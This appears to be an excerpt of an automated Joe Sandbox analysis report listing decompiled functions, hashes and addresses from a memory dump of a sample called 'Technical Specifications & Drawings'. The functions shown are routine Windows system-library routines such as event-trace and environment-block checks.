                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27f3d76f6f479e960a8af7bd6d7d1a7f639de0064567dda683987bd42d5a9eb4
                                                  • Instruction ID: ef8df101d3874111b892ada74ba233df00f6753ffa4ff6f7b9d89a43ffc060bb
                                                  • Opcode Fuzzy Hash: 27f3d76f6f479e960a8af7bd6d7d1a7f639de0064567dda683987bd42d5a9eb4
                                                  • Instruction Fuzzy Hash: 0A017C7220194A7FD752AB69CD88E57F7ACEB56B60B000229F508C7A12CF24ED11CAE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186138A Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E0186138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x189d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E017C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                  0x0186138a
                                                  0x0186138a
                                                  0x01861399
                                                  0x018613a3
                                                  0x018613a8
                                                  0x018613aa
                                                  0x018613b5
                                                  0x018613bb
                                                  0x018613c3
                                                  0x018613c6
                                                  0x018613c9
                                                  0x018613d4
                                                  0x018613e6
                                                  0x018613d6
                                                  0x018613df
                                                  0x018613df
                                                  0x018613f1
                                                  0x018613f2
                                                  0x018613f4
                                                  0x018613f9
                                                  0x0186140e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fb1a23017f02118c927a3a2b2457683b30e503f031dbd06f65d010118b8ca74
                                                  • Instruction ID: 852d2d429883206a386c741eb6f1e8fae891875aa89ff2138e3aa734358a96d6
                                                  • Opcode Fuzzy Hash: 7fb1a23017f02118c927a3a2b2457683b30e503f031dbd06f65d010118b8ca74
                                                  • Instruction Fuzzy Hash: 83019271A00209AFCB14DFA8D949EAEBBF8EF44700F40405AF901EB280DA749B40CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018614FB Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E018614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x189d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E017EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E017C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                  0x018614fb
                                                  0x018614fb
                                                  0x0186150a
                                                  0x01861514
                                                  0x01861519
                                                  0x0186151b
                                                  0x01861526
                                                  0x0186152c
                                                  0x01861534
                                                  0x01861537
                                                  0x0186153a
                                                  0x01861545
                                                  0x01861557
                                                  0x01861547
                                                  0x01861550
                                                  0x01861550
                                                  0x01861562
                                                  0x01861563
                                                  0x01861565
                                                  0x0186156a
                                                  0x0186157f

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea345e245ef763f72055dd6ee0b583bab8076bcfbc99382e6161cc8aa633e56a
                                                  • Instruction ID: 0bc991298d7fb3486df2713970457d642dd348492c581abf0fe68ea31cba4702
                                                  • Opcode Fuzzy Hash: ea345e245ef763f72055dd6ee0b583bab8076bcfbc99382e6161cc8aa633e56a
                                                  • Instruction Fuzzy Hash: D0019271A00249AFCB14DFA8D849EAEFBF8EF44700F44405AF905EB280DA70DB40CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A58EC Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E017A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x189d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1785c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E017A5943() != 0 &&  *0x1895320 > 5) {
					E01827B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01827B5E( &_v28, _t28);
					_t11 = E01827B9C(0x1895320, 0x178bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E017EB640(_t11, _t17, _v8 ^ _t29, 0x178bf15, _t27, _t28);
			}















                                                  0x017a58fb
                                                  0x017a58fe
                                                  0x017a5906
                                                  0x017a590a
                                                  0x017a593c
                                                  0x017a593c
                                                  0x017a590c
                                                  0x017a590c
                                                  0x017a5911
                                                  0x00000000
                                                  0x017a5913
                                                  0x017a5913
                                                  0x017a5913
                                                  0x017a5911
                                                  0x017a591d
                                                  0x01801035
                                                  0x0180103c
                                                  0x0180103f
                                                  0x01801056
                                                  0x01801056
                                                  0x017a593b

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a66826b4beb745bc0b2fe4c46c08ca9e3375e762e87dce990926a9cf433a2607
                                                  • Instruction ID: c45634f5239af321ce8e1d88381fc1dfd4537bc8148d53ea43347e813ee222fd
                                                  • Opcode Fuzzy Hash: a66826b4beb745bc0b2fe4c46c08ca9e3375e762e87dce990926a9cf433a2607
                                                  • Instruction Fuzzy Hash: E301A731A00115EBC715EB69D8059AEF7ACEF95330F990269EA05DB244DE30DE05CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017BB02A Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E017C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01827016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                  0x017bb037
                                                  0x017bb039
                                                  0x017bb03b
                                                  0x017bb040
                                                  0x0180a60e
                                                  0x00000000
                                                  0x00000000
                                                  0x0180a61d
                                                  0x017bb04b
                                                  0x017bb04e
                                                  0x0180a627
                                                  0x0180a634
                                                  0x00000000
                                                  0x00000000
                                                  0x0180a641
                                                  0x0180a653
                                                  0x0180a643
                                                  0x0180a64c
                                                  0x0180a64c
                                                  0x0180a65b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0180a66c
                                                  0x017bb057
                                                  0x017bb057
                                                  0x017bb057
                                                  0x017bb046
                                                  0x017bb046
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction ID: 7fe18fddd1e2a682e7d84444d06d445cfb8631a71ce8cf1187c0bbbae1b1e899
                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction Fuzzy Hash: D3018472200A84DFE327875DCDC8FB6BBE8EB85750F0900A1FA25CB691D729DD40C621
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01871074 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E01871074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0187165E(__ebx, 0x1898ae4, (__edx -  *0x1898b04 >> 0x14) + (__edx -  *0x1898b04 >> 0x14), __edi, __ecx, (__edx -  *0x1898b04 >> 0x14) + (__edx -  *0x1898b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0186AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E017C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0185FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                  0x01871074
                                                  0x01871080
                                                  0x01871082
                                                  0x0187108a
                                                  0x0187108f
                                                  0x01871093
                                                  0x018710ab
                                                  0x018710ab
                                                  0x018710c3
                                                  0x018710cf
                                                  0x018710e1
                                                  0x018710d1
                                                  0x018710da
                                                  0x018710da
                                                  0x018710e9
                                                  0x018710f5
                                                  0x018710f5
                                                  0x018710fe

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1acec18707fd9f2032162878bc45f7486c95c60f6323f2aafef8902abb4afa2a
                                                  • Instruction ID: e340810281dc5ce83dc2fecb6a783aa218bcfc8f9bfb3be2c662224ffd04aa94
                                                  • Opcode Fuzzy Hash: 1acec18707fd9f2032162878bc45f7486c95c60f6323f2aafef8902abb4afa2a
                                                  • Instruction Fuzzy Hash: 76014C726047469FC711EF2CC808B1ABBD9BB84314F048529F986D3690DE30D644CB93
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0185FEC0 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E0185FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x189d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E017C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x0185fec0
                                                  0x0185fec0
                                                  0x0185fecf
                                                  0x0185fed9
                                                  0x0185fede
                                                  0x0185fee0
                                                  0x0185feeb
                                                  0x0185fef3
                                                  0x0185fef6
                                                  0x0185fef9
                                                  0x0185ff04
                                                  0x0185ff16
                                                  0x0185ff06
                                                  0x0185ff0f
                                                  0x0185ff0f
                                                  0x0185ff21
                                                  0x0185ff22
                                                  0x0185ff24
                                                  0x0185ff29
                                                  0x0185ff3e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b5361c9c995d663ed8e5e2adc7fe995cd3073f56c35e343116f406ab6b1a7ff
                                                  • Instruction ID: 8d71aaad8bfddd6af5762aee4801dd5c62d538f7924a7014f94da5a705a504ae
                                                  • Opcode Fuzzy Hash: 6b5361c9c995d663ed8e5e2adc7fe995cd3073f56c35e343116f406ab6b1a7ff
                                                  • Instruction Fuzzy Hash: CF018871A00209ABDB14DBA9D849FAEBBF8EF45700F404066FA01DB280D9709A41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0185FE3F Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E0185FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x189d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E017EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E017C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x0185fe3f
                                                  0x0185fe3f
                                                  0x0185fe4e
                                                  0x0185fe58
                                                  0x0185fe5d
                                                  0x0185fe5f
                                                  0x0185fe6a
                                                  0x0185fe72
                                                  0x0185fe75
                                                  0x0185fe78
                                                  0x0185fe83
                                                  0x0185fe95
                                                  0x0185fe85
                                                  0x0185fe8e
                                                  0x0185fe8e
                                                  0x0185fea0
                                                  0x0185fea1
                                                  0x0185fea3
                                                  0x0185fea8
                                                  0x0185febd

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b537f16d08796945b8de20af27b454103c06770ed70fbe2a5ba2be0aba02fb5b
                                                  • Instruction ID: 7e01c1808ca9e5c204e1d3e3fb46c9eaee0a87611fe8bd618a1383dd4dfb345a
                                                  • Opcode Fuzzy Hash: b537f16d08796945b8de20af27b454103c06770ed70fbe2a5ba2be0aba02fb5b
                                                  • Instruction Fuzzy Hash: 86018871A00209ABDB14DFA9D849FAEBBF8EF44704F004066F900DB281D9709A41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878A62 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E01878A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x189d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E017C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017EB640(E017E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x01878a62
                                                  0x01878a71
                                                  0x01878a79
                                                  0x01878a82
                                                  0x01878a85
                                                  0x01878a89
                                                  0x01878a8c
                                                  0x01878a8f
                                                  0x01878a92
                                                  0x01878a95
                                                  0x01878a9f
                                                  0x01878ab1
                                                  0x01878aa1
                                                  0x01878aaa
                                                  0x01878aaa
                                                  0x01878abc
                                                  0x01878abd
                                                  0x01878abf
                                                  0x01878ac4
                                                  0x01878ada

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12a2370d68ff22df6acb6a2c56fbda965ef4e700007e721bdb4fa812d4600aad
                                                  • Instruction ID: 467add101ce599c437ccb8c9e11c861875951d5e08a1df54adc677198947cf49
                                                  • Opcode Fuzzy Hash: 12a2370d68ff22df6acb6a2c56fbda965ef4e700007e721bdb4fa812d4600aad
                                                  • Instruction Fuzzy Hash: F50121B1A0021DAFCB04DFA9D9459AEFBF8FF59714F50405AF905E7341D634AA00CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878ED6 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E01878ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x189d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E017C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                  0x01878ed6
                                                  0x01878ee5
                                                  0x01878eed
                                                  0x01878ef0
                                                  0x01878efa
                                                  0x01878f03
                                                  0x01878f0c
                                                  0x01878f15
                                                  0x01878f24
                                                  0x01878f27
                                                  0x01878f31
                                                  0x01878f43
                                                  0x01878f33
                                                  0x01878f3c
                                                  0x01878f3c
                                                  0x01878f4e
                                                  0x01878f4f
                                                  0x01878f51
                                                  0x01878f56
                                                  0x01878f69

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03330cd1ffc0722f36c6e4d4771919f2686a58fc2fd05fe065c253e605f0555a
                                                  • Instruction ID: c353bbe5db72d260df9e9c037f9d1ebb71c724c4092dcb302fe1f7ddc826ac85
                                                  • Opcode Fuzzy Hash: 03330cd1ffc0722f36c6e4d4771919f2686a58fc2fd05fe065c253e605f0555a
                                                  • Instruction Fuzzy Hash: FD111E71A0020A9FDB04DFA8D545BAEFBF4FF08300F0442AAE519EB381E634DA40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017ADB60 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E017ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E017AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L017AE8B0(__ecx, _t14, 0xfff);
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                  0x017adb64
                                                  0x017adb66
                                                  0x017adb6b
                                                  0x017adbaa
                                                  0x017adb71
                                                  0x017adb76
                                                  0x017adb7a
                                                  0x017adba3
                                                  0x017adb7c
                                                  0x017adb87
                                                  0x017adb8b
                                                  0x01804fa1
                                                  0x01804fb3
                                                  0x01804fb8
                                                  0x017adb91
                                                  0x017adb96
                                                  0x017adb98
                                                  0x017adb98
                                                  0x017adb8b
                                                  0x017adb7a
                                                  0x017adb9d
                                                  0x017adba2

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction ID: 5a021578f754197ba7f79f2d3926f784e999b3fa22b21355fd69ec39709e6e2a
                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction Fuzzy Hash: CFF0FC33241523DBD3335AD9C888F2BFA968FD1A60F550635F2059BB48CE608C0286D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AB1E1 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E017C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E017C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01827016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                  0x017ab1e8
                                                  0x017ab1ea
                                                  0x017ab1f3
                                                  0x01804a17
                                                  0x017ab1f9
                                                  0x017ab1f9
                                                  0x017ab1f9
                                                  0x017ab201
                                                  0x01804a21
                                                  0x01804a2e
                                                  0x00000000
                                                  0x00000000
                                                  0x01804a3b
                                                  0x01804a4d
                                                  0x01804a3d
                                                  0x01804a46
                                                  0x01804a46
                                                  0x01804a55
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017ab20a
                                                  0x017ab20a
                                                  0x017ab20a
                                                  0x017ab20a

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
